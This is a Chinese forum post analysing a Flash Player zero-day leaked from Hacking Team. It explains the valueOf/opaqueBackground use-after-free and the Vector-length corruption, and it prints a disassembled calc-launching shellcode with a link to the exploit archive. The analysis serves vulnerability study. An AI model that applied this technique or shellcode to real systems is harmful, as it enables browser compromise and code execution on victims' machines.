阅读:2810回复:0
Hacking Team 新 Flash 0day分析
◆0 背景
继前几天从Hacking Team中找到一个flash 0day,Adobe发布修复补丁之后,又被人在邮件中找到了一个flash 0day。 readme中描述,影响范围为Adobe Flash Player 9+ 32/64-bit (since Jun 2006)。 Windows中的IE,OS X中的firefox均可直接执行计算器。 ◆1 漏洞分析 漏洞文件http://krash.in/flashnew0day.zip,是从Hacking Team邮件中找到Flash 0day,简单看一下该漏洞的利用方法。 点击Run Calc之后,该程序会调用Check64()函数,这个函数是该漏洞的一个简化版,程序用32、64不同的内存结构判断当前是32位进程还是64位。程序在最开始重载了MyClass的valueOf 图片:20150711035900589042.png 而opeaqueBackground属性接受数值型,故如果传入一个类,会显示调用该类的valueOf一次,这个也是之前的一个UAF用的一个技巧。所以,在第一次走到下列语句设置opaqueBackground的时候走到了valueOf1: 图片:20150711035900589042.png 在valueOf1中,攻击者使用recreateTextLine重用_tl这个textLine,随之,原始TextBlock(_tb)中的内部TextLine对象被释放。 图片:20150711035900589042.png -----> 图片:20150711035900589042.png 图片:20150711035900589042.png 然后,在valueOf中使用 图片:20150711035900589042.png 占住这片被释放的内存,1016是TextLine对象在内存中的大小,1344相当于多分配了一块内存(1016/4-8)。函数return 1,写入到这片内存中。 valueOf返回后,程序搜索_ar,找到值为1的一项,根据该项的位置判断是32还是64位系统: 图片:20150711035900589042.png 随后,程序调用TryExpl(),这里使用了类似的方式: 先分配特殊长度的Vector和TextLine留待后用,接着将MyClass的valueOf也设置为valueOf2: 图片:20150711035900589042.png 然后设置opaqueBackground属性,_mc是MyClass的实例,因此触发valueOf2: 图片:20150711035900589042.png 在valueOf2中使用和之前一样的方式给_ar的所有元素全部做一次内存破坏,vLen的值是98。 图片:20150711035900589042.png 返回后,程序在_ar中搜索被破坏的块,并设置下一个Vector的Length为0x40000000,后续就是经典的Vector操作了。 图片:20150711035900589042.png 图片:20150711035900589042.png 在IE11+Flash Player 17中,跟踪可发现length被覆盖后的Vector: 图片:20150711035900589042.png ◆2 使用的shellcode 和之前一样,使用CreateProcessA调用calc #!c0:008> uf 0x603b1b8Flow analysis was incomplete, some code may be missing0603b1b8 55 push ebp0603b1b9 8bec mov ebp,esp0603b1bb 83c4ac add esp,0FFFFFFACh0603b1be 53 push ebx0603b1bf 51 push ecx0603b1c0 57 push edi0603b1c1 648b0530000000 mov eax,dword ptr fs:[30h]0603b1c8 8b400c mov eax,dword ptr [eax+0Ch]0603b1cb 8b400c mov eax,dword ptr [eax+0Ch]0603b1ce 8b00 mov eax,dword ptr [eax]0603b1d0 8b00 mov eax,dword ptr [eax]0603b1d2 8b5818 mov ebx,dword ptr [eax+18h]0603b1d5 89d8 mov eax,ebx0603b1d7 03403c add eax,dword ptr [eax+3Ch]0603b1da 8b5078 mov edx,dword ptr [eax+78h]0603b1dd 01da add edx,ebx0603b1df 8b7a20 mov edi,dword ptr [edx+20h]0603b1e2 01df add edi,ebx0603b1e4 31c9 xor ecx,ecx0603b1e6 8b07 mov eax,dword ptr [edi]0603b1e8 01d8 add eax,ebx0603b1ea 813843726561 cmp dword ptr [eax],61657243h ; Crea0603b1f0 751c jne 0603b20e0603b1f2 81780b73734100 cmp dword ptr [eax+0Bh],offset IEXPLORE!api-ms-win-downlevel-shell32-l1-1-0_NULL_THUNK_DATA_DLA (IEXPLORE+0x37373) (00417373) ;ssA (=>CreateProcessA)0603b1f9 7513 jne 0603b20e0603b1fb 8b4224 mov eax,dword ptr [edx+24h]0603b1fe 01d8 add eax,ebx0603b200 0fb70448 movzx eax,word ptr [eax+ecx*2]0603b204 8b521c mov edx,dword ptr [edx+1Ch]0603b207 01da add edx,ebx0603b209 031c82 add ebx,dword ptr [edx+eax*4]0603b20c eb09 jmp 0603b2170603b20e 83c704 add edi,40603b211 41 inc ecx0603b212 3b4a18 cmp ecx,dword ptr [edx+18h]0603b215 7ccf jl 0603b1e60603b217 8d45f0 lea eax,[ebp-10h]0603b21a 50 push eax0603b21b 8d7dac lea edi,[ebp-54h]0603b21e 57 push edi0603b21f 31c0 xor eax,eax0603b221 b911000000 mov ecx,11h0603b226 f3ab rep stos dword ptr es:[edi]0603b228 c745ac44000000 mov dword ptr [ebp-54h],44h0603b22f 50 push eax0603b230 50 push eax0603b231 50 push eax0603b232 50 push eax0603b233 50 push eax0603b234 50 push eax0603b235 e809000000 call 0603b2430603b23a 63616c arpl word ptr [ecx+6Ch],sp0603b23d 632e arpl word ptr [esi],bp0603b23f 657865 js 0603b2a70603b242 0050ff add byte ptr [eax-1],dl0603b245 d35f59 rcr dword ptr [edi+59h],cl0603b248 5b pop ebx0603b249 c1e003 shl eax,30603b24c 83c006 add eax,60603b24f c9 leave0603b250 c3 ret 图片:20150711035900589042.png ◆3 效果 图片:20150711035900589042.png 在IE11中成功地启动了calc.exe 桌面截图: 图片:20150711035900589042.png 图片:20150711035900589042.png |
|